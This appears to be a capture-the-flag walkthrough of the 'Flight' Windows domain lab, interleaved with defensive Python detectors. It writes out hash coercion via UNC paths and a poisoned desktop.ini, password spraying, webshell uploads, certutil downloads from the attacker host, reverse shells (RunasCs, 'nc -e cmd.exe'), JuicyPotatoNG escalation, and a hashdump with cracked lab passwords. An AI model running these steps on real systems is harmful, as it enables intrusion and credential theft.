Basic information

Port scan

Port 80, plus the usual Windows domain ports:

```
$ nmap -sC -sV -Pn 10.10.11.187
Starting Nmap 7.93 ( https://nmap.org ) at 2022-11-07 13:39 CST
Nmap scan report for 10.10.11.187
Host is up (0.21s latency).
Not shown: 988 filtered tcp ports (no-response)
PORT STATE SERVICE VERSION
53/tcp open domain Simple DNS Plus
80/tcp open http Apache httpd 2.4.52 ((Win64) OpenSSL/1.1.1m PHP/8.1.1)
|_http-server-header: Apache/2.4.52 (Win64) OpenSSL/1.1.1m PHP/8.1.1
|_http-title: g0 Aviation
| http-methods:
|_ Potentially risky methods: TRACE
88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2022-11-07 12:42:13Z)
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: flight.htb0., Site: Default-First-Site-Name)
445/tcp open microsoft-ds?
464/tcp open kpasswd5?
593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
636/tcp open tcpwrapped
3268/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: flight.htb0., Site: Default-First-Site-Name)
3269/tcp open tcpwrapped
Service Info: Host: G0; OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
| smb2-time:
| date: 2022-11-07T12:42:28
|_ start_date: N/A
| smb2-security-mode:
| 311:
|_ Message signing enabled and required
|_clock-skew: 7h00m00s

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 219.19 seconds
```

Port 80

An airline company website:

Subdomain scan

The main domain can be found at the bottom of the port 80 page; probing further for subdomains turns up school:

```
10.10.11.187 flight.htb

ffuf -w ~/Tools/dict/SecLists/Discovery/DNS/subdomains-top1million-5000.txt:FUZZ -u "http://flight.htb/" -H 'Host: FUZZ.flight.htb' -fs 7069

school [Status: 200, Size: 3996, Words: 1045, Lines: 91, Duration: 214ms]
```

school

After adding school to the hosts file and visiting it, a view parameter appears; guess LFI:

LFI

Reading index.php directly shows various filters in the code:

```
view-source:http://school.flight.htb/index.php?view=index.php
```

Responder

But note this is a Windows target, and these filters do not filter out UNC paths, so start Responder, capture the svc_apache hash, and crack the password:

```
sudo python3 Responder.py -i 10.10.14.5 -wP

http://school.flight.htb/index.php?view=//10.10.14.5/miao

[SMB] NTLMv2-SSP Client : 10.10.11.187
[SMB] NTLMv2-SSP Username : flight\svc_apache
[SMB] NTLMv2-SSP Hash : svc_apache::flight:d97722b76908e7cd...

sudo john --wordlist=/usr/share/wordlists/rockyou.txt hash.txt

S@Ss!K@*t13 (svc_apache)
```
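The filters in index.php block the usual local-path tricks but not UNC paths, and the request shown above is exactly what a defender would want to catch in the web server's access log. The following Python is an added example written for this writeup's context, not code from the original post or from any tool it uses: it parses constructed Apache combined-format log lines (the addresses mirror the lab's 10.10.x.x range), flags any query parameter whose decoded value is a UNC path, including double-URL-encoded ones, and shows the allowlist check that is the actual fix for a `view` parameter. The allowlist contents are an assumption.

```python
"""Detect UNC-path coercion attempts in Apache access logs.

Added example (not from the original writeup). SAMPLE_LOG is constructed;
the 10.10.x.x addresses mirror the writeup's lab setup.
"""
import re
from urllib.parse import parse_qsl, unquote, urlsplit

# Apache combined log format, e.g.
# 10.10.14.5 - - [07/Nov/2022:13:40:01 +0800] "GET /index.php?view=x HTTP/1.1" 200 512 "-" "curl"
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<target>\S+) [^"]*" (?P<status>\d{3})'
)

# A UNC path starts with two slashes or two backslashes followed by a host
# component: \\host\share or //host/share. Windows APIs accept mixed
# separators, so both forms are treated the same here.
UNC_RE = re.compile(r'^[\\/]{2}[^\\/]+[\\/]')

# Assumed list of pages the site is allowed to include (hypothetical).
ALLOWED_VIEWS = frozenset({"index.php", "about.html", "blog.html"})

SAMPLE_LOG = [
    '10.10.14.5 - - [07/Nov/2022:13:40:01 +0800] "GET /index.php?view=index.php HTTP/1.1" 200 7069 "-" "Mozilla/5.0"',
    '10.10.14.5 - - [07/Nov/2022:13:40:09 +0800] "GET /index.php?view=//10.10.14.5/miao HTTP/1.1" 200 3996 "-" "Mozilla/5.0"',
    '10.10.14.5 - - [07/Nov/2022:13:40:15 +0800] "GET /index.php?view=%5C%5C10.10.14.5%5Cmiao HTTP/1.1" 200 3996 "-" "curl/7.85"',
    '10.10.14.5 - - [07/Nov/2022:13:40:21 +0800] "GET /index.php?view=%255C%255C10.10.14.5%255Cmiao HTTP/1.1" 200 3996 "-" "curl/7.85"',
    '10.10.14.9 - - [07/Nov/2022:13:41:02 +0800] "GET /styles.css HTTP/1.1" 304 0 "-" "Mozilla/5.0"',
]


def is_unc_path(value: str) -> bool:
    """True if `value` (already URL-decoded) names a UNC share path."""
    return bool(UNC_RE.match(value))


def detect_unc_requests(lines):
    """Return (client_ip, param, value) for every query parameter carrying a UNC path."""
    hits = []
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue  # not a well-formed access log line
        query = urlsplit(m.group("target")).query
        # parse_qsl decodes one layer of percent-encoding; unquote() a second
        # time so a double-encoded value such as %255C%255C is still caught.
        for param, raw in parse_qsl(query, keep_blank_values=True):
            value = unquote(raw)
            if is_unc_path(value):
                hits.append((m.group("ip"), param, value))
    return hits


def safe_view(value: str, allowed=ALLOWED_VIEWS):
    """Allowlist resolution for a `view` parameter: return the page name only if
    it is exactly one of the known pages, otherwise None. A denylist of bad
    prefixes is what let the UNC path through; an allowlist has nothing to bypass."""
    return value if value in allowed else None


if __name__ == "__main__":
    for ip, param, value in detect_unc_requests(SAMPLE_LOG):
        print(f"{ip} sent UNC path in {param}: {value}")
```

Run it as-is and it reports three hits, all from 10.10.14.5 and all in the `view` parameter, while the plain `view=index.php` and the stylesheet request pass. Blocking outbound SMB (TCP 445) from the web server is the complementary control: even if the parameter is reached, the NTLM authentication never leaves the host.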

SMB

Enumerate SMB with the obtained credentials:

Users

Enumerate users with the obtained password, then password spray; s.moon turns out to use the same password:

```
crackmapexec smb 10.10.11.187 -u svc_apache -p 'S@Ss!K@*t13' --users

./cme smb 10.10.11.187 -u users.txt -p 'S@Ss!K@*t13' --continue-on-success

SMB 10.10.11.187 445 G0 [+] flight.htb\S.Moon:S@Ss!K@*t13
```

users.txt

```
svc_apache
O.Possum
V.Stevens
D.Truff
I.Francis
W.Walker
C.Bum
M.Gold
L.Kein
G.Lors
R.Cold
S.Moon
krbtgt
Guest
Administrator
```

Shared

Trying psexec as S.Moon fails, but S.Moon has write permission on the shared directory:

This directory may be accessed periodically by other users, so try another way to obtain a hash:

```
└─$ smbclient //10.10.11.187/shared -U s.moon
Password for [WORKGROUP\s.moon]:
Try "help" to get a list of possible commands.
smb: \> put desktop.ini
putting file desktop.ini as \desktop.ini (0.1 kb/s) (average 0.1 kb/s)
smb: \>

[SMB] NTLMv2-SSP Client : 10.10.11.187
[SMB] NTLMv2-SSP Username : flight.htb\c.bum
[SMB] NTLMv2-SSP Hash : c.bum::flight.htb:a80233880ad07bcc...
```

After a while, the c.bum user's hash comes in:

Crack the password in the same way:

```
sudo john --wordlist=/usr/share/wordlists/rockyou.txt hash.txt

Tikkycoll_431012284 (c.bum)
```

desktop.ini

```
[.ShellClassInfo]
IconResource=\\10.10.14.5\miao
```
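The desktop.ini above works because Explorer parses the file automatically whenever a user lists the folder, so a share that grants write access to low-privileged users needs to be checked for such files. The following Python is an added example, not code from the original writeup: it walks a share root, reads every desktop.ini (handling the UTF-16 encoding Windows often writes them in), and reports IconResource/IconFile values that point at a host outside an assumed allowlist of internal file servers. The sample share it lays out in a temporary directory is constructed; FILESERVER01 is a hypothetical trusted host, and 10.10.14.5 is the writeup's attacker address used as the value the scanner should flag.

```python
"""Hunt for poisoned desktop.ini files on a writable share.

Added example, not from the original writeup. The share laid out by
build_sample_share() is constructed; FILESERVER01 is a hypothetical trusted
host and 10.10.14.5 is the address the scanner is expected to flag.
"""
import os
import re
import tempfile

# Keys in desktop.ini that Explorer resolves on folder view and that can name a remote path.
WATCHED_KEYS = ("iconresource", "iconfile")

UNC_RE = re.compile(r'^[\\/]{2}(?P<host>[^\\/]+)[\\/]')


def remote_host(value: str):
    """Return the host named by a UNC path (or file: URL), else None."""
    v = value.strip().strip('"')
    if v.lower().startswith("file:"):
        v = v[5:]
    m = UNC_RE.match(v)
    return m.group("host") if m else None


def read_text(path: str) -> str:
    """desktop.ini is frequently UTF-16 with a BOM; fall back to UTF-8 otherwise."""
    with open(path, "rb") as fh:
        data = fh.read()
    if data.startswith((b"\xff\xfe", b"\xfe\xff")):
        return data.decode("utf-16", errors="replace")
    return data.decode("utf-8", errors="replace")


def scan_share(root: str, trusted_hosts=frozenset()):
    """Walk `root`; return (relative_path, key, host) for every watched key in a
    desktop.ini that points at a host outside `trusted_hosts` (case-insensitive)."""
    trusted = {h.lower() for h in trusted_hosts}
    findings = []
    for dirpath, _dirs, files in os.walk(root):
        for fname in files:
            if fname.lower() != "desktop.ini":
                continue
            full = os.path.join(dirpath, fname)
            for line in read_text(full).splitlines():
                if "=" not in line:
                    continue
                key, _, value = line.partition("=")
                if key.strip().lower() not in WATCHED_KEYS:
                    continue
                host = remote_host(value)
                if host and host.lower() not in trusted:
                    findings.append((os.path.relpath(full, root), key.strip(), host))
    return findings


def build_sample_share(root: str) -> str:
    """Constructed share: one benign desktop.ini (local icon), one pointing at a
    trusted server, and one pointing at an outside host."""
    os.makedirs(os.path.join(root, "reports"))
    os.makedirs(os.path.join(root, "templates"))
    with open(os.path.join(root, "reports", "desktop.ini"), "w") as f:
        f.write("[.ShellClassInfo]\nIconResource=C:\\Windows\\System32\\shell32.dll,3\n")
    with open(os.path.join(root, "templates", "desktop.ini"), "wb") as f:
        f.write("[.ShellClassInfo]\nIconFile=\\\\fileserver01\\icons\\folder.ico\n".encode("utf-16"))
    with open(os.path.join(root, "desktop.ini"), "w") as f:
        f.write("[.ShellClassInfo]\nIconResource=\\\\10.10.14.5\\miao\n")
    return root


def demo():
    """Build the constructed share in a temp dir and scan it."""
    with tempfile.TemporaryDirectory() as tmp:
        build_sample_share(tmp)
        return scan_share(tmp, trusted_hosts={"FILESERVER01"})


if __name__ == "__main__":
    for path, key, host in demo():
        print(f"{path}: {key} points at {host}")
```

Only the root-level desktop.ini is reported: the local shell32.dll icon is not a UNC path and the UTF-16 file pointing at FILESERVER01 is on the trusted list. Removing write access for ordinary users on shares that others browse, and blocking outbound SMB from workstations to untrusted hosts, are the controls that make the captured c.bum authentication above impossible.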

Web

The c.bum user can write to the web directory; upload a webshell and request it to trigger it, which yields an svc_apache shell:

```
└─$ smbclient //10.10.11.187/web -U c.bum
Password for [WORKGROUP\c.bum]:
Try "help" to get a list of possible commands.
smb: \> ls
. D 0 Mon Nov 7 21:38:38 2022
.. D 0 Mon Nov 7 21:38:38 2022
flight.htb D 0 Mon Nov 7 21:37:00 2022
school.flight.htb D 0 Mon Nov 7 21:37:00 2022
shell.php A 42 Mon Nov 7 21:38:38 2022

5056511 blocks of size 4096. 1028784 blocks available
smb: \> cd school.flight.htb
smb: \school.flight.htb\> put shell.php
putting file shell.php as \school.flight.htb\shell.php (0.1 kb/s) (average 0.0 kb/s)
smb: \school.flight.htb\>
```

c.bum shell & user flag

Since the c.bum user's password is already known, runas can execute arbitrary commands directly; this enhanced version (RunasCs) returns a shell directly:

Transfer the file through the SMB share, run it in the svc_apache shell, and get a c.bum shell:

```
.\Runascs.exe c.bum Tikkycoll_431012284 powershell -r 10.10.14.5:5555
```

Privilege escalation enumeration

Enumeration finds a service listening on local port 8000, which is a system service:

```
Active Connections

Proto Local Address Foreign Address State PID
TCP 0.0.0.0:8000 0.0.0.0:0 LISTENING 4

tasklist /fi "pid eq 4"

Image Name PID Session Name Session# Mem Usage
========================= ======== ================ =========== ============
System 4 Services 0 156 K
```

Forward it out to take a look:

```
# local
./chisel_1.7.0-rc7_darwin_amd64 server -p 9999 --reverse

# target
certutil.exe -urlcache -f http://10.10.14.5:7777/chisel.exe chisel.exe
.\chisel.exe client --max-retry-count=1 10.10.14.5:9999 R:8000:127.0.0.1:8000
```

It is an ASPX site; place a webshell directly in the corresponding directory c:\inetpub\development\ and trigger it through the web to obtain IIS service privileges:

```
certutil.exe -urlcache -f http://10.10.14.5:7777/cmdasp.aspx cmdasp.aspx
```

What remains is service to SYSTEM; the account holds SeImpersonatePrivilege.

Privilege escalation & root flag

```
certutil.exe -urlcache -f http://10.10.14.5:7778/nc.exe nc.exe
certutil.exe -urlcache -f http://10.10.14.5:7778/JuicyPotatoNG.exe JuicyPotatoNG.exe

# allow both binaries to be run by everyone
icacls .\nc.exe /grant Everyone:F
icacls .\JuicyPotatoNG.exe /grant Everyone:F

# run in the IIS APPPOOL\DefaultAppPool shell
c:\temp\JuicyPotatoNG.exe -t * -p "C:\temp\nc.exe" -a "10.10.14.5 6666 -e cmd.exe"
```

After that, load meterpreter, read the flag, and hashdump:

```
certutil.exe -urlcache -f http://10.10.14.5:7777/met.exe met.exe
```

hashdump

```
meterpreter > hashdump
Administrator:500:aad3b435b51404eeaad3b435b51404ee:43bbfc530bab76141b12c8446e30c17c:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
krbtgt:502:aad3b435b51404eeaad3b435b51404ee:6a2b6ce4d7121e112aeacbc6bd499a7f:::
S.Moon:1602:aad3b435b51404eeaad3b435b51404ee:f36b6972be65bc4eaa6983b5e9f1728f:::
R.Cold:1603:aad3b435b51404eeaad3b435b51404ee:5607f6eafc91b3506c622f70e7a77ce0:::
G.Lors:1604:aad3b435b51404eeaad3b435b51404ee:affa4975fc1019229a90067f1ff4af8d:::
L.Kein:1605:aad3b435b51404eeaad3b435b51404ee:4345fc90cb60ef29363a5f38e24413d5:::
M.Gold:1606:aad3b435b51404eeaad3b435b51404ee:78566aef5cd5d63acafdf7fed7a931ff:::
C.Bum:1607:aad3b435b51404eeaad3b435b51404ee:bc0359f62da42f8023fdde0949f4a359:::
W.Walker:1608:aad3b435b51404eeaad3b435b51404ee:ec52dceaec5a847af98c1f9de3e9b716:::
I.Francis:1609:aad3b435b51404eeaad3b435b51404ee:4344da689ee61b6fbbcdfa9303d324bc:::
D.Truff:1610:aad3b435b51404eeaad3b435b51404ee:b89f7c98ece6ca250a59a9f4c1533d44:::
V.Stevens:1611:aad3b435b51404eeaad3b435b51404ee:2a4836e3331ed290bd1c2fd2b50beb41:::
svc_apache:1612:aad3b435b51404eeaad3b435b51404ee:f36b6972be65bc4eaa6983b5e9f1728f:::
O.Possum:1613:aad3b435b51404eeaad3b435b51404ee:68ec50916875888f44caff424cd3f8ac:::
G0$:1001:aad3b435b51404eeaad3b435b51404ee:140547f31f4dbb4599dc90ea84c27e6b:::
meterpreter >
```
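A hash dump is also an audit input: two accounts with the same NT hash have the same password, which is exactly why the password spray earlier landed on S.Moon with svc_apache's password. The following Python is an added example, not part of the original writeup: it parses the pwdump-format lines above and reports NT hashes shared by more than one account, accounts whose NT hash is the well-known empty-password hash, and accounts that still store an LM hash (the aad3b435... value is the empty LM hash, meaning no LM hash is stored).

```python
"""Audit a pwdump-style hash dump for password reuse and empty passwords.

Added example, not from the original writeup; HASHDUMP is the hashdump
output shown above. The two constants are the well-known hashes of an empty
LM password and an empty NT password.
"""
from collections import defaultdict

EMPTY_LM = "aad3b435b51404eeaad3b435b51404ee"
EMPTY_NT = "31d6cfe0d16ae931b73c59d7e0c089c0"

HASHDUMP = """\
meterpreter > hashdump
Administrator:500:aad3b435b51404eeaad3b435b51404ee:43bbfc530bab76141b12c8446e30c17c:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
krbtgt:502:aad3b435b51404eeaad3b435b51404ee:6a2b6ce4d7121e112aeacbc6bd499a7f:::
S.Moon:1602:aad3b435b51404eeaad3b435b51404ee:f36b6972be65bc4eaa6983b5e9f1728f:::
R.Cold:1603:aad3b435b51404eeaad3b435b51404ee:5607f6eafc91b3506c622f70e7a77ce0:::
G.Lors:1604:aad3b435b51404eeaad3b435b51404ee:affa4975fc1019229a90067f1ff4af8d:::
L.Kein:1605:aad3b435b51404eeaad3b435b51404ee:4345fc90cb60ef29363a5f38e24413d5:::
M.Gold:1606:aad3b435b51404eeaad3b435b51404ee:78566aef5cd5d63acafdf7fed7a931ff:::
C.Bum:1607:aad3b435b51404eeaad3b435b51404ee:bc0359f62da42f8023fdde0949f4a359:::
W.Walker:1608:aad3b435b51404eeaad3b435b51404ee:ec52dceaec5a847af98c1f9de3e9b716:::
I.Francis:1609:aad3b435b51404eeaad3b435b51404ee:4344da689ee61b6fbbcdfa9303d324bc:::
D.Truff:1610:aad3b435b51404eeaad3b435b51404ee:b89f7c98ece6ca250a59a9f4c1533d44:::
V.Stevens:1611:aad3b435b51404eeaad3b435b51404ee:2a4836e3331ed290bd1c2fd2b50beb41:::
svc_apache:1612:aad3b435b51404eeaad3b435b51404ee:f36b6972be65bc4eaa6983b5e9f1728f:::
O.Possum:1613:aad3b435b51404eeaad3b435b51404ee:68ec50916875888f44caff424cd3f8ac:::
G0$:1001:aad3b435b51404eeaad3b435b51404ee:140547f31f4dbb4599dc90ea84c27e6b:::
meterpreter >
"""


def parse_pwdump(text: str):
    """Yield (user, rid, lm, nt) for each well-formed user:rid:lm:nt::: line;
    prompts and other noise are skipped."""
    for line in text.splitlines():
        parts = line.strip().split(":")
        if len(parts) < 4 or not parts[1].isdigit():
            continue
        yield parts[0], int(parts[1]), parts[2].lower(), parts[3].lower()


def audit(text: str) -> dict:
    """Return a report with three keys:
    shared - {nt_hash: [users...]} for NT hashes used by more than one account
    empty  - users whose NT hash is the empty-password hash
    lm_set - users that still have a real LM hash stored (weak, crackable)
    """
    by_nt = defaultdict(list)
    empty, lm_set = [], []
    for user, _rid, lm, nt in parse_pwdump(text):
        by_nt[nt].append(user)
        if nt == EMPTY_NT:
            empty.append(user)
        if lm != EMPTY_LM:
            lm_set.append(user)
    shared = {h: users for h, users in by_nt.items() if len(users) > 1}
    return {"shared": shared, "empty": empty, "lm_set": lm_set}


if __name__ == "__main__":
    report = audit(HASHDUMP)
    for nt, users in report["shared"].items():
        print(f"password reuse ({nt[:8]}...): {', '.join(users)}")
    for user in report["empty"]:
        print(f"empty password: {user}")
    for user in report["lm_set"]:
        print(f"LM hash stored: {user}")
```

On this dump the only reuse group is S.Moon and svc_apache, Guest is the only empty-password account (it is disabled by default, but worth confirming), and no LM hashes are stored. Service accounts sharing a human user's password is the finding that mattered in this chain; a group managed service account, or at minimum a unique credential, for svc_apache would have stopped the spray at the first hop.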

References